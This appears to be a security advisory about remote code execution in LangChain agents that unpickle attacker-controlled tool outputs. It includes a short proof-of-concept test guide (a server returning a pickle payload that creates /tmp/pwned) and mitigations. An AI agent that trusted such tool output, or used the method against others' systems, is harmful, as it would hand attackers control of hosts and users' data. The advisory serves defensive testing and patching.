Remote Code Execution in LangChain Agents via Deserialization of Malicious Tool Outputs
Overview
A critical remote code execution (RCE) vulnerability was found in agents constructed with LangChain that use tools capable of returning serialized data, such as Python's `pickle` format. The attack scenario involves an attacker controlling the output of a tool that the LangChain agent interacts with. For instance, an agent designed to query a custom API could be tricked into querying an attacker-controlled endpoint. This malicious endpoint returns a pickled Python object that, when deserialized by the agent's Python environment using `pickle.load()`, executes arbitrary code. The vulnerability stems from the implicit trust placed in the data returned by external tools. Developers often create agents that directly process tool outputs without sanitization, assuming the tools are trusted. This pattern allows an attacker who can compromise or impersonate any single tool in an agent's toolchain to gain full control over the agent's host environment. The impact is severe, potentially leading to complete system compromise, data theft, or lateral movement within the network.
Affected Systems
Testing Guide
1. **Create a Malicious Tool:** Set up a simple web server that returns a malicious pickle payload. The payload should execute a benign command like `touch /tmp/pwned`. You can generate this payload using Python's `pickle` module. 2. **Configure a LangChain Agent:** Create a simple agent that uses a `Requests` or similar tool to make a GET request to your malicious server. 3. **Run the Agent:** Trigger the agent to use the tool and query your server. 4. **Check for Execution:** Check if the file `/tmp/pwned` was created on the machine running the agent. If it exists, your environment is vulnerable.
Mitigation Steps
1. **Upgrade LangChain:** Update to the latest version of LangChain, which has introduced warnings and safer defaults for tool interactions. 2. **Avoid Insecure Deserialization:** Never use `pickle` to deserialize data from untrusted or unverified sources. Use safe data interchange formats like JSON instead. 3. **Sandbox Tool Execution:** Run agents and their tools in isolated, sandboxed environments (e.g., containers with restricted permissions and no network access) to limit the blast radius of a potential compromise. 4. **Validate Tool Output:** Treat all data returned from tools as untrusted. Implement strict validation and sanitization on tool outputs before processing them further.
Patch Details
LangChain versions 0.2.5 and later include improved safety measures and warnings against insecure patterns.